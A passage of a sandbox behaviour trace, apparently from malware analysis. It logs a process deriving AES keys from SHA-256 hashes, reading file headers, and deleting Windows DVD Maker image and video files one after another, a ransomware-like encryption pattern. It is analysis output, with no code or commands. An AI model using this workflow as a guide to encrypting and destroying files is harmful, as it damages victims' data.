phHash=0x326a4d0) returned 1 [0154.038] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.038] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.038] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x658e [0154.038] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.042] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.042] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.042] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.043] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png")) returned 0 [0154.043] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.044] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.044] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.044] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.044] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x321a4 [0154.044] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.057] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.057] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.057] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.058] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv")) returned 0 [0154.058] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.059] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.059] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.059] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.059] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef24 [0154.059] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.161] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.161] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.161] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.163] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv")) returned 0 [0154.163] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.164] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.164] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.164] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.164] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef24 [0154.164] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.173] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.173] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.173] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.175] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv")) returned 0 [0154.176] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.177] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.177] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.177] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.177] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37f64 [0154.177] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.248] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.248] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.248] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.250] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv")) returned 0 [0154.251] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.251] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.252] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.252] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.252] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.252] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb04 [0154.252] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.255] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.255] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.255] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.271] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png")) returned 0 [0154.272] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.273] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.273] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.273] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.273] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4d86 [0154.273] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.278] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.278] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.278] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.280] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png")) returned 0 [0154.284] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.285] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.286] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.286] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.286] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.286] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0154.286] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.290] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.290] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.290] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.292] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png")) returned 0 [0154.292] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.293] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.293] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.293] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.293] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0154.293] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.297] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.297] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.297] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.299] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png")) returned 0 [0154.299] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.300] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.300] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.300] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.300] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0154.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.328] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.328] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.328] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.330] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png")) returned 0 [0154.330] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.331] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.331] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.331] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.331] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0154.331] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.334] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.334] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.334] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.336] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png")) returned 0 [0154.336] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.337] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.337] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.337] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.337] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0154.337] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.341] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.341] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.341] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.343] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png")) returned 0 [0154.343] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.344] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.344] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.344] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.344] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0154.344] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.350] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.350] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.350] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.352] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png")) returned 0 [0154.353] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.354] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.354] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.354] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.354] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0154.354] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.358] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.358] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.358] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.359] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png")) returned 0 [0154.360] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.361] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.361] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.361] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.361] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0154.361] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.364] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.364] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.364] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.366] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png")) returned 0 [0154.404] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.405] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.405] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.405] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.405] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c2b [0154.405] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.421] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.421] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.421] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.422] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png")) returned 0 [0154.422] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.423] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.423] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.423] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.423] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdcdf [0154.423] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.429] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.429] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.429] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.430] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png")) returned 0 [0154.431] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.431] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.431] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.431] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.431] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c5d [0154.431] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.434] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.434] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.434] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.436] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png")) returned 0 [0154.436] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0154.437] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0154.437] CryptHashData (hHash=0x284d568, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.437] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0154.437] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5caa [0154.437] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0154.441] CryptDestroyHash (hHash=0x284d568) returned 1 